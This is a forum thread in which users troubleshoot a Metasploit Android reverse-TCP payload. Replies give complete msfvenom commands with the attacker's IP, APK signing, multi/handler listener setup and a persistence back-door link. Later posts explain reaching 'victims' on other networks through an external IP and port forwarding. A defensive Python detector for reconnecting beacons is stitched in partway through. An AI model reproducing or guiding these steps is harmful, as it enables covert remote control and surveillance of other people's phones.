Forum Thread: Android Doesn't Connect Back to Metasploit with App Payload?


I am trying to connect my Android device to Metasploit via reverse TCP, but it never shows up on the console. I have a Nexus 5 running NetHunter and Android 5.1.1.

The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk

In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.

Do I need to select architecture, or runtime?

10 Responses

If you are using an internal IP, the devices have to be in one subnet. Otherwise, you have to set up port forwarding.

So what did you do? You connected the Android device to the network, then installed the app, and created a session in msfconsole on the attacker's machine?

Pretty much. Every tutorial I have seen just connects it all like so, and it all seems to work for them.

This might be a redundant question but did you start a listener?

1- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R -o test.apk

2- msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.124
set LPORT 4444
exploit

Now, you have 5.1.1, and with every update they might have patched something, so don't expect every exploit to work as well as on older versions. However, this is not an exploit per se and is based on a simple outgoing connection. Still, you might have an antivirus or protection software or god knows what on the newest versions (I didn't upgrade yet so I don't know), so switch off any built-in or side-app security that could block suspicious connections. The things you specified you've done are correct (assuming the phone is inside the network and that you've set up the handler correctly as HXR ROFO said). Try signing the app with d2j-apk-sign if you have trouble installing it. -Ne-py

Is your phone connected to the same Wi-Fi as your PC?

Try putting your private IP in your LHOST when making the payload...

Also see if the app isn't opening on the phone, or if it is being closed by some other app...

Hi, I suppose you found your way around this, but anyway I will share the solution I found for others who may read this:

1) Generate the android payload:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

2) Sign the payload .apk:
# d2j-apk-sign -w base.apk
(This will generate base-signed.apk; change the name if desired...)

3) Start Listener:
# msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.124
> exploit

4) Install apk on your phone.

Remember to delete the app (MainActivity) if the connection fails before you try again...

Even though I managed to get a connection, it seems to drop quite fast; sometimes it hardly connects and drops instantly. I suppose this depends on the device, as on another old device the connection lasts a bit longer. The only solution I found was to install a persistence script and try to gain the connection back by restarting the listener, but still I wonder if there's a way to keep the connection alive.

Here is the link from this forum where I saw the persistence script:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

(If the script fails, delete the "--user 0" option in the script; in my case it worked, but first try it as it comes...)

Hope this helps; if I find anything else I will come back to share.
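The behaviour this thread is chasing (an app on a phone repeatedly opening outbound TCP connections to a LAN peer on a non-service port, dropping, and reconnecting) is also exactly what a defender should be looking for on the network side. The following is an added example written for this page, not code from the thread, Metasploit, or NetHunter. It parses a small set of constructed per-app connection records (the log format, app names and addresses are all made up for the example) and flags any app that keeps reconnecting to a private-range host on a port that is not a known service port, which is the reverse-connection pattern described above.

```python
import re
import ipaddress
from collections import defaultdict

# Constructed sample connection records (not from the thread): timestamp, app,
# protocol, source -> destination, TCP state. The format mimics a per-app
# connection dump; the app names and addresses are invented for this example.
SAMPLE_LOG = """\
2024-01-01T10:00:01 app=com.example.unknownapp tcp 192.168.43.55:40122 -> 192.168.43.124:4444 ESTABLISHED
2024-01-01T10:00:05 app=com.example.unknownapp tcp 192.168.43.55:40123 -> 192.168.43.124:4444 ESTABLISHED
2024-01-01T10:00:09 app=com.example.unknownapp tcp 192.168.43.55:40124 -> 192.168.43.124:4444 ESTABLISHED
2024-01-01T10:00:10 app=com.android.chrome tcp 192.168.43.55:50010 -> 142.250.74.46:443 ESTABLISHED
2024-01-01T10:00:12 app=com.example.mail tcp 192.168.43.55:50011 -> 192.168.43.1:993 ESTABLISHED
2024-01-01T10:00:15 app=com.example.mail tcp 192.168.43.55:50012 -> 192.168.43.1:993 ESTABLISHED
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) app=(?P<app>\S+) (?P<proto>tcp|udp) "
    r"(?P<src_ip>[\d.]+):(?P<src_port>\d+) -> "
    r"(?P<dst_ip>[\d.]+):(?P<dst_port>\d+) (?P<state>\S+)$"
)

# Ports on which an outbound connection to a LAN host is expected
# (web, mail, DNS, SSH, ...). Anything else to a LAN peer is worth a look.
KNOWN_SERVICE_PORTS = {22, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 8080, 8443}


def parse_line(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["src_port"] = int(rec["src_port"])
    rec["dst_port"] = int(rec["dst_port"])
    return rec


def find_reverse_connection_candidates(lines, known_ports=KNOWN_SERVICE_PORTS,
                                       min_reconnects=2):
    """Flag (app, destination) pairs that keep reconnecting on a non-service port.

    Each distinct source port is treated as a fresh connection attempt, so a
    beacon that drops and reconnects (as described in the thread) shows up as
    several source ports toward the same destination.
    """
    groups = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue
        key = (rec["app"], rec["dst_ip"], rec["dst_port"])
        groups[key].add(rec["src_port"])

    findings = []
    for (app, dst_ip, dst_port), src_ports in groups.items():
        if dst_port in known_ports:
            continue
        if len(src_ports) < min_reconnects:
            continue
        findings.append({
            "app": app,
            "dst_ip": dst_ip,
            "dst_port": dst_port,
            "reconnects": len(src_ports),
            # A private destination means the peer is on the LAN, which is the
            # same-subnet setup the thread says a reverse TCP payload needs.
            "lan_peer": ipaddress.ip_address(dst_ip).is_private,
        })
    return findings


if __name__ == "__main__":
    for f in find_reverse_connection_candidates(SAMPLE_LOG.splitlines()):
        print(f"{f['app']} -> {f['dst_ip']}:{f['dst_port']} "
              f"({f['reconnects']} reconnects, lan_peer={f['lan_peer']})")
```

On the constructed sample only the unknown app is reported: the browser talks to a public host on 443 and the mail app reconnects to the LAN router on 993, both of which are whitelisted by port. On a real device the same logic can be fed from a per-app connection dump or a firewall log with the regex adjusted to that format; the known-port set should be tuned to what the network actually serves, since a legitimate LAN service on an odd port would otherwise trip it.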

The Android payload works only on the same network; outside of the network it can't work. Any idea about this problem?
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

To make an external IP payload you must specify your external IP.

Visit dnsleaktest.com or ipchicken.com for example and copy your external IP.

Then replace your internal IP in the payload:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=EXTERNAL_IP LPORT=4444 R > /root/base.apk

In addition, you could redirect the traffic from port 4444 to your internal IP in the router settings, just to make sure it arrives at your machine. I did it, but I'm not sure if we could skip this and it would still work...

EDIT: I just remembered, if you set port 4444 on the multi/handler listener in Metasploit I really don't think you need to redirect traffic in the router settings; I will give it a try when I get some time.

Same here, it only gets connected while the victim is on the same network. How can I get connected to a victim who connects to another WLAN???
